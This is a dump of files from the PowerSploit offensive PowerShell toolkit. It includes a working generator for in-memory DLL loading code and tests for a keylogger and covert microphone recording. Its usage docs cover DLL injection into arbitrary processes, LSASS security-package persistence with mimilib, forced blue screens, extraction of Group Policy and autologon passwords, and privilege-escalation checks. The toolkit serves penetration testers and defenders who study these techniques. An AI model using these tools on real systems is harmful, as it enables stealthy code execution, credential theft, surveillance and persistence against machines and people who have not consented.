-------------------------------------------------------------------------------- /powershell/PowerSploit/Recon/Dictionaries/generic.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/isaudits/scripts/9785abda7485c304c5ef452a8bf4068269d1d769/powershell/PowerSploit/Recon/Dictionaries/generic.txt -------------------------------------------------------------------------------- /powershell/PowerSploit/Recon/Recon.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} 2 | -------------------------------------------------------------------------------- /powershell/PowerSploit/ScriptModification/Out-CompressedDll.ps1: -------------------------------------------------------------------------------- 1 | function Out-CompressedDll 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. 7 | 8 | PowerSploit Function: Out-CompressedDll 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array. 17 | 18 | .PARAMETER FilePath 19 | 20 | Specifies the path to a managed executable. 21 | 22 | .EXAMPLE 23 | 24 | Out-CompressedDll -FilePath evil.dll 25 | 26 | Description 27 | ----------- 28 | Compresses, base64 encodes, and outputs the code required to load evil.dll in memory. 29 | 30 | .NOTES 31 | 32 | Only pure MSIL-based dlls can be loaded using this technique. Native or IJW ('it just works' - mixed-mode) dlls will not load. 33 | 34 | .LINK 35 | 36 | http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html 37 | #> 38 | 39 | [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] 40 | [CmdletBinding()] 41 | Param ( 42 | [Parameter(Mandatory = $True)] 43 | [String] 44 | $FilePath 45 | ) 46 | 47 | $Path = Resolve-Path $FilePath 48 | 49 | if (! [IO.File]::Exists($Path)) 50 | { 51 | Throw "$Path does not exist." 52 | } 53 | 54 | $FileBytes = [System.IO.File]::ReadAllBytes($Path) 55 | 56 | if (($FileBytes[0..1] | ForEach-Object {[Char]$_}) -join '' -cne 'MZ') 57 | { 58 | Throw "$Path is not a valid executable." 59 | } 60 | 61 | $Length = $FileBytes.Length 62 | $CompressedStream = New-Object IO.MemoryStream 63 | $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress) 64 | $DeflateStream.Write($FileBytes, 0, $FileBytes.Length) 65 | $DeflateStream.Dispose() 66 | $CompressedFileBytes = $CompressedStream.ToArray() 67 | $CompressedStream.Dispose() 68 | $EncodedCompressedFile = [Convert]::ToBase64String($CompressedFileBytes) 69 | 70 | Write-Verbose "Compression ratio: $(($EncodedCompressedFile.Length/$FileBytes.Length).ToString('#%'))" 71 | 72 | $Output = @" 73 | `$EncodedCompressedFile = @' 74 | $EncodedCompressedFile 75 | '@ 76 | `$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`$EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress) 77 | `$UncompressedFileBytes = New-Object Byte[]($Length) 78 | `$DeflatedStream.Read(`$UncompressedFileBytes, 0, $Length) | Out-Null 79 | [Reflection.Assembly]::Load(`$UncompressedFileBytes) 80 | "@ 81 | 82 | Write-Output $Output 83 | } 84 | -------------------------------------------------------------------------------- /powershell/PowerSploit/ScriptModification/ScriptModification.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'ScriptModification.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '3.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Copyright statement for this module 16 | Copyright = 'BSD 3-Clause' 17 | 18 | # Description of the functionality provided by this module 19 | Description = 'PowerSploit Script Preparation/Modification Module' 20 | 21 | # Minimum version of the Windows PowerShell engine required by this module 22 | PowerShellVersion = '2.0' 23 | 24 | # Functions to export from this module 25 | FunctionsToExport = '*' 26 | 27 | # List of all files packaged with this module 28 | FileList = 'ScriptModification.psm1', 'ScriptModification.psd1', 'Out-CompressedDll.ps1', 'Out-EncodedCommand.ps1', 29 | 'Out-EncryptedScript.ps1', 'Remove-Comment.ps1', 'Usage.md' 30 | 31 | } 32 | -------------------------------------------------------------------------------- /powershell/PowerSploit/ScriptModification/ScriptModification.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} 2 | -------------------------------------------------------------------------------- /powershell/PowerSploit/ScriptModification/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module ScriptModification` 7 | 8 | To see the commands imported, type `Get-Command -Module ScriptModification` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /powershell/PowerSploit/Tests/Exfiltration.tests.ps1: -------------------------------------------------------------------------------- 1 | Set-StrictMode -Version Latest 2 | 3 | $TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent 4 | $ModuleRoot = Resolve-Path "$TestScriptRoot\.." 5 | $ModuleManifest = "$ModuleRoot\Exfiltration\Exfiltration.psd1" 6 | 7 | Remove-Module [E]xfiltration 8 | Import-Module $ModuleManifest -Force -ErrorAction Stop 9 | 10 | Describe 'Get-Keystrokes' { 11 | 12 | if (Test-Path "$($env:TEMP)\key.log") { Remove-Item -Force "$($env:TEMP)\key.log" } 13 | $WindowTitle = (Get-Process -Id $PID).MainWindowTitle 14 | 15 | $Shell = New-Object -ComObject wscript.shell 16 | $Shell.AppActivate($WindowTitle) 17 | 18 | $KeyLogger = Get-Keystrokes -PassThru 19 | Start-Sleep -Seconds 1 20 | 21 | $Shell.SendKeys("Pester`b`b`b`b`b`b") 22 | $KeyLogger.Dispose() 23 | 24 | It 'Should output to file' { Test-Path "$($env:TEMP)\key.log" | Should Be $true } 25 | 26 | $KeyObjects = Get-Content -Path "$($env:TEMP)\key.log" | ConvertFrom-Csv 27 | 28 | It 'Should log keystrokes' { 29 | $FileLength = (Get-Item "$($env:TEMP)\key.log").Length 30 | $FileLength | Should BeGreaterThan 14 31 | } 32 | 33 | It 'Should get foreground window title' { 34 | $KeyObjects[0].WindowTitle | Should Be $WindowTitle 35 | } 36 | 37 | It 'Should log time of key press' { 38 | $KeyTime = [DateTime]::Parse($KeyObjects[0].Time) 39 | $KeyTime.GetType().Name | Should Be 'DateTime' 40 | } 41 | 42 | It 'Should stop logging after timeout' { 43 | 44 | $Timeout = 0.05 45 | $KeyLogger = Get-Keystrokes -Timeout $Timeout -PassThru 46 | 47 | Start-Sleep -Seconds 4 48 | 49 | $KeyLogger.Runspace.RunspaceAvailability | Should Be 'Available' 50 | $KeyLogger.Dispose() 51 | } 52 | 53 | Remove-Item -Force "$($env:TEMP)\key.log" 54 | } 55 | 56 | Describe "Get-MicrophoneAudio" { 57 | 58 | $RecordPath = "$env:TEMP\test_record.wav" 59 | $RecordLen = 2 60 | Context 'Successful Recording' { 61 | BeforeEach { 62 | #Ensure the recording as been removed prior to testing 63 | Remove-Item -Path $RecordPath -ErrorAction SilentlyContinue 64 | } 65 | 66 | AfterEach { 67 | #Remove the recording after testing 68 | Remove-Item -Path $RecordPath -ErrorAction SilentlyContinue 69 | } 70 | 71 | It 'should record audio from the microphone and save it to a specified path' { 72 | $result = Get-MicrophoneAudio -Path $RecordPath -Length $RecordLen 73 | $result | Should Not BeNullOrEmpty 74 | $result.Length | Should BeGreaterThan 0 75 | } 76 | 77 | } 78 | 79 | Context 'Invalid Arguments' { 80 | It 'should not allow invalid paths to be used' { 81 | { Get-MicrophoneAudio -Path "c:\FAKEPATH\yay.wav" -Length RecordLen} | Should Throw 82 | } 83 | } 84 | 85 | } 86 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Tests/PowerSploit.tests.ps1: -------------------------------------------------------------------------------- 1 | Set-StrictMode -Version Latest 2 | 3 | $TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent 4 | $ModuleRoot = Resolve-Path "$TestScriptRoot\.." 5 | 6 | filter Assert-NotLittleEndianUnicode { 7 | [CmdletBinding()] 8 | param ( 9 | [Parameter(Mandatory = $True, 10 | ValueFromPipelineByPropertyName = $True, 11 | ValueFromPipeline = $True)] 12 | [Alias('FullName')] 13 | [String[]] 14 | $FilePath 15 | ) 16 | 17 | $LittleEndianMarker = 48111 # 0xBBEF 18 | 19 | Write-Verbose "Current file: $FilePath" 20 | Write-Debug "Current file: $FilePath" 21 | 22 | if ([System.IO.Directory]::Exists($FilePath)) { 23 | Write-Debug "File is a directory." 24 | return 25 | } 26 | 27 | if (-not [System.IO.File]::Exists($FilePath)) { 28 | Write-Debug "File does not exist." 29 | return 30 | } 31 | 32 | $FileBytes = Get-Content -TotalCount 3 -Encoding Byte -Path $FilePath 33 | 34 | if ($FileBytes.Length -le 2) { 35 | Write-Debug "File must be at least 2 bytes in length." 36 | return 37 | } 38 | 39 | if ([BitConverter]::ToUInt16($FileBytes, 0) -eq $LittleEndianMarker) { 40 | Write-Debug "File contains little endian unicode marker." 41 | throw "$_ is little-endian unicode encoded." 42 | } 43 | } 44 | 45 | Describe 'ASCII encoding of all scripts' { 46 | It 'should not contain little-endian unicode encoded scripts or modules' { 47 | { Get-ChildItem -Path $ModuleRoot -Recurse -Include *.ps1,*.psd1,*.psm1 | Assert-NotLittleEndianUnicode } | Should Not Throw 48 | } 49 | } -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/CodeExecution/Invoke-DllInjection.md: -------------------------------------------------------------------------------- 1 | # Invoke-DllInjection 2 | 3 | ## SYNOPSIS 4 | Injects a Dll into the process ID of your choosing. 5 | 6 | PowerSploit Function: Invoke-DllInjection 7 | Author: Matthew Graeber (@mattifestation) 8 | License: BSD 3-Clause 9 | Required Dependencies: None 10 | Optional Dependencies: None 11 | 12 | ## SYNTAX 13 | 14 | ``` 15 | Invoke-DllInjection [-ProcessID] [-Dll] 16 | ``` 17 | 18 | ## DESCRIPTION 19 | Invoke-DllInjection injects a Dll into an arbitrary process. 20 | It does this by using VirtualAllocEx to allocate memory the size of the 21 | DLL in the remote process, writing the names of the DLL to load into the 22 | remote process spacing using WriteProcessMemory, and then using RtlCreateUserThread 23 | to invoke LoadLibraryA in the context of the remote process. 24 | 25 | ## EXAMPLES 26 | 27 | ### -------------------------- EXAMPLE 1 -------------------------- 28 | ``` 29 | Invoke-DllInjection -ProcessID 4274 -Dll evil.dll 30 | ``` 31 | 32 | Description 33 | ----------- 34 | Inject 'evil.dll' into process ID 4274. 35 | 36 | ## PARAMETERS 37 | 38 | ### -ProcessID 39 | Process ID of the process you want to inject a Dll into. 40 | 41 | ```yaml 42 | Type: Int32 43 | Parameter Sets: (All) 44 | Aliases: 45 | 46 | Required: True 47 | Position: 1 48 | Default value: 0 49 | Accept pipeline input: False 50 | Accept wildcard characters: False 51 | ``` 52 | 53 | ### -Dll 54 | Name of the dll to inject. 55 | This can be an absolute or relative path. 56 | 57 | ```yaml 58 | Type: String 59 | Parameter Sets: (All) 60 | Aliases: 61 | 62 | Required: True 63 | Position: 2 64 | Default value: None 65 | Accept pipeline input: False 66 | Accept wildcard characters: False 67 | ``` 68 | 69 | ## INPUTS 70 | 71 | ## OUTPUTS 72 | 73 | ## NOTES 74 | Use the '-Verbose' option to print detailed information. 75 | 76 | ## RELATED LINKS 77 | 78 | [http://www.exploit-monday.com](http://www.exploit-monday.com) 79 | 80 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Mayhem/Set-CriticalProcess.md: -------------------------------------------------------------------------------- 1 | # Set-CriticalProcess 2 | 3 | ## SYNOPSIS 4 | Causes your machine to blue screen upon exiting PowerShell. 5 | 6 | PowerSploit Function: Set-CriticalProcess 7 | Author: Matthew Graeber (@mattifestation) 8 | License: BSD 3-Clause 9 | Required Dependencies: None 10 | Optional Dependencies: None 11 | 12 | ## SYNTAX 13 | 14 | ``` 15 | Set-CriticalProcess [-Force] [-ExitImmediately] [-WhatIf] [-Confirm] 16 | ``` 17 | 18 | ## DESCRIPTION 19 | {{Fill in the Description}} 20 | 21 | ## EXAMPLES 22 | 23 | ### -------------------------- EXAMPLE 1 -------------------------- 24 | ``` 25 | Set-CriticalProcess 26 | ``` 27 | 28 | ### -------------------------- EXAMPLE 2 -------------------------- 29 | ``` 30 | Set-CriticalProcess -ExitImmediately 31 | ``` 32 | 33 | ### -------------------------- EXAMPLE 3 -------------------------- 34 | ``` 35 | Set-CriticalProcess -Force -Verbose 36 | ``` 37 | 38 | ## PARAMETERS 39 | 40 | ### -Force 41 | Set the running PowerShell process as critical without asking for confirmation. 42 | 43 | ```yaml 44 | Type: SwitchParameter 45 | Parameter Sets: (All) 46 | Aliases: 47 | 48 | Required: False 49 | Position: Named 50 | Default value: False 51 | Accept pipeline input: False 52 | Accept wildcard characters: False 53 | ``` 54 | 55 | ### -ExitImmediately 56 | Immediately exit PowerShell after successfully marking the process as critical. 57 | 58 | ```yaml 59 | Type: SwitchParameter 60 | Parameter Sets: (All) 61 | Aliases: 62 | 63 | Required: False 64 | Position: Named 65 | Default value: False 66 | Accept pipeline input: False 67 | Accept wildcard characters: False 68 | ``` 69 | 70 | ### -WhatIf 71 | Shows what would happen if the cmdlet runs. 72 | The cmdlet is not run. 73 | 74 | ```yaml 75 | Type: SwitchParameter 76 | Parameter Sets: (All) 77 | Aliases: wi 78 | 79 | Required: False 80 | Position: Named 81 | Default value: None 82 | Accept pipeline input: False 83 | Accept wildcard characters: False 84 | ``` 85 | 86 | ### -Confirm 87 | Prompts you for confirmation before running the cmdlet. 88 | 89 | ```yaml 90 | Type: SwitchParameter 91 | Parameter Sets: (All) 92 | Aliases: cf 93 | 94 | Required: False 95 | Position: Named 96 | Default value: None 97 | Accept pipeline input: False 98 | Accept wildcard characters: False 99 | ``` 100 | 101 | ## INPUTS 102 | 103 | ## OUTPUTS 104 | 105 | ## NOTES 106 | 107 | ## RELATED LINKS 108 | 109 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Persistence/Get-SecurityPackage.md: -------------------------------------------------------------------------------- 1 | # Get-SecurityPackage 2 | 3 | ## SYNOPSIS 4 | Enumerates all loaded security packages (SSPs). 5 | 6 | Author: Matthew Graeber (@mattifestation) 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | Optional Dependencies: None 10 | 11 | ## SYNTAX 12 | 13 | ``` 14 | Get-SecurityPackage 15 | ``` 16 | 17 | ## DESCRIPTION 18 | Get-SecurityPackage is a wrapper for secur32!EnumerateSecurityPackages. 19 | It also parses the returned SecPkgInfo struct array. 20 | 21 | ## EXAMPLES 22 | 23 | ### -------------------------- EXAMPLE 1 -------------------------- 24 | ``` 25 | Get-SecurityPackage 26 | ``` 27 | 28 | ## PARAMETERS 29 | 30 | ## INPUTS 31 | 32 | ## OUTPUTS 33 | 34 | ## NOTES 35 | 36 | ## RELATED LINKS 37 | 38 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Persistence/Install-SSP.md: -------------------------------------------------------------------------------- 1 | # Install-SSP 2 | 3 | ## SYNOPSIS 4 | Installs a security support provider (SSP) dll. 5 | 6 | Author: Matthew Graeber (@mattifestation) 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | Optional Dependencies: None 10 | 11 | ## SYNTAX 12 | 13 | ``` 14 | Install-SSP [[-Path] ] 15 | ``` 16 | 17 | ## DESCRIPTION 18 | Install-SSP installs an SSP dll. 19 | Installation involves copying the dll to 20 | %windir%\System32 and adding the name of the dll to 21 | HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages. 22 | 23 | ## EXAMPLES 24 | 25 | ### -------------------------- EXAMPLE 1 -------------------------- 26 | ``` 27 | Install-SSP -Path .\mimilib.dll 28 | ``` 29 | 30 | ## PARAMETERS 31 | 32 | ### -Path 33 | {{Fill Path Description}} 34 | 35 | ```yaml 36 | Type: String 37 | Parameter Sets: (All) 38 | Aliases: 39 | 40 | Required: False 41 | Position: 1 42 | Default value: None 43 | Accept pipeline input: False 44 | Accept wildcard characters: False 45 | ``` 46 | 47 | ## INPUTS 48 | 49 | ## OUTPUTS 50 | 51 | ## NOTES 52 | The SSP dll must match the OS architecture. 53 | i.e. 54 | You must have a 64-bit SSP dll 55 | if you are running a 64-bit OS. 56 | In order for the SSP dll to be loaded properly 57 | into lsass, the dll must export SpLsaModeInitialize. 58 | 59 | ## RELATED LINKS 60 | 61 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Add-ServiceDacl.md: -------------------------------------------------------------------------------- 1 | # Add-ServiceDacl 2 | 3 | ## SYNOPSIS 4 | Adds a Dacl field to a service object returned by Get-Service. 5 | 6 | Author: Matthew Graeber (@mattifestation) 7 | License: BSD 3-Clause 8 | Required Dependencies: PSReflect 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Add-ServiceDacl [-Name] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Takes one or more ServiceProcess.ServiceController objects on the pipeline and adds a 18 | Dacl field to each object. 19 | It does this by opening a handle with ReadControl for the 20 | service with using the GetServiceHandle Win32 API call and then uses 21 | QueryServiceObjectSecurity to retrieve a copy of the security descriptor for the service. 22 | 23 | ## EXAMPLES 24 | 25 | ### -------------------------- EXAMPLE 1 -------------------------- 26 | ``` 27 | Get-Service | Add-ServiceDacl 28 | ``` 29 | 30 | Add Dacls for every service the current user can read. 31 | 32 | ### -------------------------- EXAMPLE 2 -------------------------- 33 | ``` 34 | Get-Service -Name VMTools | Add-ServiceDacl 35 | ``` 36 | 37 | Add the Dacl to the VMTools service object. 38 | 39 | ## PARAMETERS 40 | 41 | ### -Name 42 | An array of one or more service names to add a service Dacl for. 43 | Passable on the pipeline. 44 | 45 | ```yaml 46 | Type: String[] 47 | Parameter Sets: (All) 48 | Aliases: ServiceName 49 | 50 | Required: True 51 | Position: 1 52 | Default value: None 53 | Accept pipeline input: True (ByPropertyName, ByValue) 54 | Accept wildcard characters: False 55 | ``` 56 | 57 | ## INPUTS 58 | 59 | ## OUTPUTS 60 | 61 | ### ServiceProcess.ServiceController 62 | 63 | ## NOTES 64 | 65 | ## RELATED LINKS 66 | 67 | [https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/) 68 | 69 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Find-PathDLLHijack.md: -------------------------------------------------------------------------------- 1 | # Find-PathDLLHijack 2 | 3 | ## SYNOPSIS 4 | Finds all directories in the system %PATH% that are modifiable by the current user. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: Get-ModifiablePath 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Find-PathDLLHijack 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Enumerates the paths stored in Env:Path (%PATH) and filters each through Get-ModifiablePath 18 | to return the folder paths the current user can write to. 19 | On Windows 7, if wlbsctrl.dll is 20 | written to one of these paths, execution for the IKEEXT can be hijacked due to DLL search 21 | order loading. 22 | 23 | ## EXAMPLES 24 | 25 | ### -------------------------- EXAMPLE 1 -------------------------- 26 | ``` 27 | Find-PathDLLHijack 28 | ``` 29 | 30 | Finds all %PATH% .DLL hijacking opportunities. 31 | 32 | ## PARAMETERS 33 | 34 | ## INPUTS 35 | 36 | ## OUTPUTS 37 | 38 | ### PowerUp.HijackableDLL.Path 39 | 40 | ## NOTES 41 | 42 | ## RELATED LINKS 43 | 44 | [http://www.greyhathacker.net/?p=738](http://www.greyhathacker.net/?p=738) 45 | 46 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Get-CachedGPPPassword.md: -------------------------------------------------------------------------------- 1 | # Get-CachedGPPPassword 2 | 3 | ## SYNOPSIS 4 | Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences and 5 | left in cached files on the host. 6 | 7 | Author: Chris Campbell (@obscuresec) 8 | License: BSD 3-Clause 9 | Required Dependencies: None 10 | 11 | ## SYNTAX 12 | 13 | ``` 14 | Get-CachedGPPPassword 15 | ``` 16 | 17 | ## DESCRIPTION 18 | Get-CachedGPPPassword searches the local machine for cached for groups.xml, scheduledtasks.xml, services.xml and 19 | datasources.xml files and returns plaintext passwords. 20 | 21 | ## EXAMPLES 22 | 23 | ### -------------------------- EXAMPLE 1 -------------------------- 24 | ``` 25 | Get-CachedGPPPassword 26 | ``` 27 | 28 | NewName : \[BLANK\] 29 | Changed : {2013-04-25 18:36:07} 30 | Passwords : {Super!!!Password} 31 | UserNames : {SuperSecretBackdoor} 32 | File : C:\ProgramData\Microsoft\Group Policy\History\{32C4C89F-7 33 | C3A-4227-A61D-8EF72B5B9E42}\Machine\Preferences\Groups\Gr 34 | oups.xml 35 | 36 | ## PARAMETERS 37 | 38 | ## INPUTS 39 | 40 | ## OUTPUTS 41 | 42 | ## NOTES 43 | 44 | ## RELATED LINKS 45 | 46 | [http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html 47 | https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1 48 | https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb 49 | http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences 50 | http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html](http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html 51 | https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1 52 | https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb 53 | http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences 54 | http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html) 55 | 56 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Get-ModifiableRegistryAutoRun.md: -------------------------------------------------------------------------------- 1 | # Get-ModifiableRegistryAutoRun 2 | 3 | ## SYNOPSIS 4 | Returns any elevated system autoruns in which the current user can 5 | modify part of the path string. 6 | 7 | Author: Will Schroeder (@harmj0y) 8 | License: BSD 3-Clause 9 | Required Dependencies: Get-ModifiablePath 10 | 11 | ## SYNTAX 12 | 13 | ``` 14 | Get-ModifiableRegistryAutoRun 15 | ``` 16 | 17 | ## DESCRIPTION 18 | Enumerates a number of autorun specifications in HKLM and filters any 19 | autoruns through Get-ModifiablePath, returning any file/config locations 20 | in the found path strings that the current user can modify. 21 | 22 | ## EXAMPLES 23 | 24 | ### -------------------------- EXAMPLE 1 -------------------------- 25 | ``` 26 | Get-ModifiableRegistryAutoRun 27 | ``` 28 | 29 | Return vulneable autorun binaries (or associated configs). 30 | 31 | ## PARAMETERS 32 | 33 | ## INPUTS 34 | 35 | ## OUTPUTS 36 | 37 | ### PowerUp.ModifiableRegistryAutoRun 38 | 39 | Custom PSObject containing results. 40 | 41 | ## NOTES 42 | 43 | ## RELATED LINKS 44 | 45 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Get-ModifiableScheduledTaskFile.md: -------------------------------------------------------------------------------- 1 | # Get-ModifiableScheduledTaskFile 2 | 3 | ## SYNOPSIS 4 | Returns scheduled tasks where the current user can modify any file 5 | in the associated task action string. 6 | 7 | Author: Will Schroeder (@harmj0y) 8 | License: BSD 3-Clause 9 | Required Dependencies: Get-ModifiablePath 10 | 11 | ## SYNTAX 12 | 13 | ``` 14 | Get-ModifiableScheduledTaskFile 15 | ``` 16 | 17 | ## DESCRIPTION 18 | Enumerates all scheduled tasks by recursively listing "$($ENV:windir)\System32\Tasks" 19 | and parses the XML specification for each task, extracting the command triggers. 20 | Each trigger string is filtered through Get-ModifiablePath, returning any file/config 21 | locations in the found path strings that the current user can modify. 22 | 23 | ## EXAMPLES 24 | 25 | ### -------------------------- EXAMPLE 1 -------------------------- 26 | ``` 27 | Get-ModifiableScheduledTaskFile 28 | ``` 29 | 30 | Return scheduled tasks with modifiable command strings. 31 | 32 | ## PARAMETERS 33 | 34 | ## INPUTS 35 | 36 | ## OUTPUTS 37 | 38 | ### PowerUp.ModifiableScheduledTaskFile 39 | 40 | Custom PSObject containing results. 41 | 42 | ## NOTES 43 | 44 | ## RELATED LINKS 45 | 46 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Get-ModifiableService.md: -------------------------------------------------------------------------------- 1 | # Get-ModifiableService 2 | 3 | ## SYNOPSIS 4 | Enumerates all services and returns services for which the current user can modify the binPath. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: Test-ServiceDaclPermission, Get-ServiceDetail 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-ModifiableService 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Enumerates all services using Get-Service and uses Test-ServiceDaclPermission to test if 18 | the current user has rights to change the service configuration. 19 | 20 | ## EXAMPLES 21 | 22 | ### -------------------------- EXAMPLE 1 -------------------------- 23 | ``` 24 | Get-ModifiableService 25 | ``` 26 | 27 | Get a set of potentially exploitable services. 28 | 29 | ## PARAMETERS 30 | 31 | ## INPUTS 32 | 33 | ## OUTPUTS 34 | 35 | ### PowerUp.ModifiablePath 36 | 37 | ## NOTES 38 | 39 | ## RELATED LINKS 40 | 41 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Get-ModifiableServiceFile.md: -------------------------------------------------------------------------------- 1 | # Get-ModifiableServiceFile 2 | 3 | ## SYNOPSIS 4 | Enumerates all services and returns vulnerable service files. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: Test-ServiceDaclPermission, Get-ModifiablePath 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-ModifiableServiceFile 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Enumerates all services by querying the WMI win32_service class. 18 | For each service, 19 | it takes the pathname (aka binPath) and passes it to Get-ModifiablePath to determine 20 | if the current user has rights to modify the service binary itself or any associated 21 | arguments. 22 | If the associated binary (or any configuration files) can be overwritten, 23 | privileges may be able to be escalated. 24 | 25 | ## EXAMPLES 26 | 27 | ### -------------------------- EXAMPLE 1 -------------------------- 28 | ``` 29 | Get-ModifiableServiceFile 30 | ``` 31 | 32 | Get a set of potentially exploitable service binares/config files. 33 | 34 | ## PARAMETERS 35 | 36 | ## INPUTS 37 | 38 | ## OUTPUTS 39 | 40 | ### PowerUp.ModifiablePath 41 | 42 | ## NOTES 43 | 44 | ## RELATED LINKS 45 | 46 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Get-RegistryAlwaysInstallElevated.md: -------------------------------------------------------------------------------- 1 | # Get-RegistryAlwaysInstallElevated 2 | 3 | ## SYNOPSIS 4 | Checks if any of the AlwaysInstallElevated registry keys are set. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-RegistryAlwaysInstallElevated 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Returns $True if the HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated 18 | or the HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated keys 19 | are set, $False otherwise. 20 | If one of these keys are set, then all .MSI files run with 21 | elevated permissions, regardless of current user permissions. 22 | 23 | ## EXAMPLES 24 | 25 | ### -------------------------- EXAMPLE 1 -------------------------- 26 | ``` 27 | Get-RegistryAlwaysInstallElevated 28 | ``` 29 | 30 | Returns $True if any of the AlwaysInstallElevated registry keys are set. 31 | 32 | ## PARAMETERS 33 | 34 | ## INPUTS 35 | 36 | ## OUTPUTS 37 | 38 | ### System.Boolean 39 | 40 | $True if RegistryAlwaysInstallElevated is set, $False otherwise. 41 | 42 | ## NOTES 43 | 44 | ## RELATED LINKS 45 | 46 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Privesc/Get-RegistryAutoLogon.md: -------------------------------------------------------------------------------- 1 | # Get-RegistryAutoLogon 2 | 3 | ## SYNOPSIS 4 | Finds any autologon credentials left in the registry. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Get-RegistryAutoLogon 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Checks if any autologon accounts/credentials are set in a number of registry locations. 18 | If they are, the credentials are extracted and returned as a custom PSObject. 19 | 20 | ## EXAMPLES 21 | 22 | ### -------------------------- EXAMPLE 1 -------------------------- 23 | ``` 24 | Get-RegistryAutoLogon 25 | ``` 26 | 27 | Finds any autologon credentials left in the registry. 28 | 29 | ## PARAMETERS 30 | 31 | ## INPUTS 32 | 33 | ## OUTPUTS 34 | 35 | ### PowerUp.RegistryAutoLogon 36 | 37 | Custom PSObject containing autologin credentials found in the registry. 38 | 39 | ## NOTES 40 | 41 | ## RELATED LINKS 42 | 43 | 